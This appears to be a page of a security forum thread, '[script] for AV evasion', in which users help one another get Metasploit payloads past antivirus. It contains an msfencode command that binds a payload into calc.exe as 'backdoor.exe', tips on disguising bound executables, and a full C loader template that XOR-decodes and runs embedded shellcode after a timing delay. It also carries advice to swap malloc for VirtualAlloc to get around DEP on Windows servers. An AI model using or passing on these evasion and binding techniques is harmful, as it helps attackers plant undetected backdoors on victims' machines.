Page 6 of 12 FirstFirst ... 45678 ... LastLast
Results 51 to 60 of 114

Thread: [script] for AV evasion

  1. #51
    Member
    Join Date
    Feb 2010
    Location
    Somewhere in the hell
    Posts
    91

    Default Re: [script] for AV evasion

    @LHYX1,

    First of all, I have tried to bind your script generated payload with other executable file. However, I do not like the result of the new binded executable file as the file description is missing.

    If it is possible to inject your script generated payload (which is before compiled with gcc) to the executable file with msfencode with -k switch? I think that the msfencode method is the most perfect one. Or, can we make change to the msfencode template for that purpose? I have no idea on msfencode, so that I raise the question here.

    Samiux

  2. #52
    Junior Member L21ZIFER's Avatar
    Join Date
    Nov 2011
    Posts
    47

    Default Re: [script] for AV evasion

    @samiux,
    could you exactly tell how the results were? Did the AVs notice anything - did the binded result even launch like the legit part of the .exe (the calculator.exe for instance) work?

    Did you test this command?
    ~/rt$ ./msfencode -t exe -x calc.exe -k -o backdoor.exe -e x86/shikata_ga_nai -c 5<br>

    where backdoor.exe is the already stealthy-exe.
    Last edited by L21ZIFER; 04-07-2012 at 04:11 AM.

  3. #53
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: [script] for AV evasion

    @samiux you can add a description and all that stuff to the binded exe file with resource hacker like I said in one of my previous posts.
    And btw did you try to use iexpress already ?
    If you still don't like the result, you can try to get it to work with msfencode but then you are going to have to adjust the code and so on...
    Or you could write your own tool to accomplish this.
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

  4. #54
    Member
    Join Date
    Feb 2010
    Location
    Somewhere in the hell
    Posts
    91

    Default Re: [script] for AV evasion

    @L21ZIFER,

    LHYX1's generated exe file does not detected by major anti-viruis programs so far. His work is great. Your mentioned msfencode command cannot inject his generated exe to calc.exe by the said command. By the way, the binded exe file (with Easy Binder) works great except the file description.

    @LHYX1,

    I am not very familiar with Windows system. Can you give me some hints to use with IExpress or Easy Binder with the your previous post? I prefer Easy Binder, thanks. Your work is great, I love it very much.

    Samiux
    Last edited by samiux; 04-07-2012 at 06:38 AM.

  5. #55
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    1

    Default Re: [script] for AV evasion

    @LHYX1 Many thanks for the script first of all. Tested it and worked with Win7 and XP.
    The problem is that it does not seem to work with Windows 2008 or Windows 2003 though.
    The exe runs with no issues but occupies one cpu core and then fails.

    Any ideas/thoughts would be much appreciated.

    Cheers,

    Nik

  6. #56
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: [script] for AV evasion

    @npavlidis I don't have Windows 2008 or Windows 2003 so I cant test anything.
    I suppose the metasploit payloads work if you don't encode them with my script on these systems ?

    This might have something to do with the decrypting for loops.
    Try changing structure.c to this:
    (I removed the long for loops to throw of the av's)

    Code:
    #include <stdlib.h>
    #include <stdio.h>
    #include <windows.h>
    #include <time.h>
    
    int main(){
    char junkA []= %s;
    unsigned char payload[] = %s;
    char junkB []= %s;
    unsigned char key = %s;
    unsigned int PAYLOAD_LENGTH = %s;
    int i;
    unsigned char* exec = (unsigned char*)malloc(PAYLOAD_LENGTH/2);
    unsigned char* unpack = (unsigned char*)malloc(PAYLOAD_LENGTH/2);
    int z, y;
    int devide;
    int x = 0;
    time_t start_time, cur_time;
    
    time(&start_time);
    do
    {
    time(&cur_time);
    }
    while((cur_time - start_time) < 2);
    
    for(i=0; i<PAYLOAD_LENGTH; i++)
    {
    devide = %s
    if(devide == 0)
    {
    unpack[x]=payload[i];
    x++;
    }
    }
    
    for(i=0; i<PAYLOAD_LENGTH/2; i++)
    {
        exec[i]=unpack[i]^key;
    }
    
    ((void (*)())exec)();
    
    return 0;
    }
    Try playing a little with this c file and see what you can execute and what you can't execute.
    Last edited by LHYX1; 05-01-2012 at 09:17 AM.
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

  7. #57
    Junior Member
    Join Date
    Aug 2011
    Posts
    34

    Default Re: [script] for AV evasion

    npavlidis,
    in windows servers default DEP policy is OptOut not OptIn like win 7/xp.
    DEP prevents the execution of the code stored in memory with malloc function, therefore you must change DEP policy or change the function used to store the code. I tried using VirtualAlloc and it worked fine on windows server 2003.
    hope i've helped
    sorry about my bad english

  8. #58
    Junior Member
    Join Date
    Aug 2011
    Posts
    34

    Default Re: [script] for AV evasion

    in windows servers default DEP policy is OptOut not OptIn like win 7/xp.
    DEP prevents the execution of the code stored in memory with malloc function, therefore you must change DEP policy or change the function used to store the code. I tried using VirtualAlloc and it worked fine on windows server 2003.
    hope i've helped
    sorry about my bad english

  9. #59
    Senior Member LHYX1's Avatar
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: [script] for AV evasion

    @jnpa123 did not know that.
    thanx for the info
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

  10. #60
    Just burned his ISO
    Join Date
    May 2012
    Posts
    1

    Default Re: [script] for AV evasion

    i keep getting the same error when trying to run any meterpreter scripts via a reverse_http session (payload option 7 - windows/meterpreter/reverse_http), i get a meterpreter session and try and run a script (persistence for example) and get this error:

    "Error in script: NoMethodError undefined method `config' for nil:NilClass"

    can anyone help me with this issue?

Page 6 of 12 FirstFirst ... 45678 ... LastLast

Similar Threads

  1. Script for simple AV evasion (tested on AVG, Avast, Emisoft)
    By LHYX1 in forum BackTrack 5 General Topics
    Replies: 16
    Last Post: 05-01-2012, 09:26 PM
  2. Script for simple AV evasion (tested on AVG, Avast, Emisoft)
    By LHYX1 in forum BackTrack 5 Beginners Section
    Replies: 1
    Last Post: 07-16-2011, 02:16 PM
  3. Snort Signature Evasion with Metasploit
    By T0XIC in forum BackTrack 5 Videos
    Replies: 6
    Last Post: 07-01-2011, 12:21 PM
  4. Advanced antivirus evasion techniques
    By AzraelSepultura in forum Beginners Forum
    Replies: 4
    Last Post: 03-01-2011, 06:57 AM
  5. Firewall evasion techniques?
    By knithx in forum OLD Pentesting
    Replies: 2
    Last Post: 09-21-2009, 06:46 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •